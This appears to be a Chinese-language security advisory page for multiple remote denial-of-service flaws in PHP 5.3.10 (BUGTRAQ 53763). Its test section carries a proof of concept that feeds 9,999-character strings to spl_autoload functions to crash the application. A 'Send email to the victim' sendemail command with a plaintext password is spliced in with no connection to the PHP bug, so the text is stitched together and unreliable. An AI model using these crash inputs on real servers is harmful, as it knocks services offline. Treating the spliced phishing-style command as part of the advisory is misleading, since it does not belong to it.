发布日期:2012-06-03
更新日期:2012-06-05受影响系统:
PHP PHP 5.3.10
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53763PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。PHP 5.3.10在实现上存在多个远程拒绝服务漏洞,成功利用后可造成应用崩溃。<*来源:Pr0T3cT10n (pr0t3ct10n@gmail.com)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!$buffer = str_repeat("A",9999);
spl_autoload_register($buffer); $buff = str_repeat("A",9999);
spl_autoload($buff); $buffer = str_repeat("A",9999);
spl_autoload_call($buffer);Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com
-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.php.netMicrosoft Windows数字证书欺骗漏洞Hexamail Server邮件体HTML注入漏洞相关资讯 PHP漏洞 拒绝服务漏洞
- PHP "ext/zip/php_zip.c"释放后重 (今 07:48)
- PHP "ext/standard/file.c" 远程拒 (09月12日)
- PHP "php_html_entities()" 函数整 (09月11日)
| - PHP ext/session/session.c对象注 (09月14日)
- PHP "libxml_disable_entity_ (09月11日)
- PHP "soap/php_http.c" 远程拒绝服 (09月11日)
|
本文评论 查看全部评论 (0)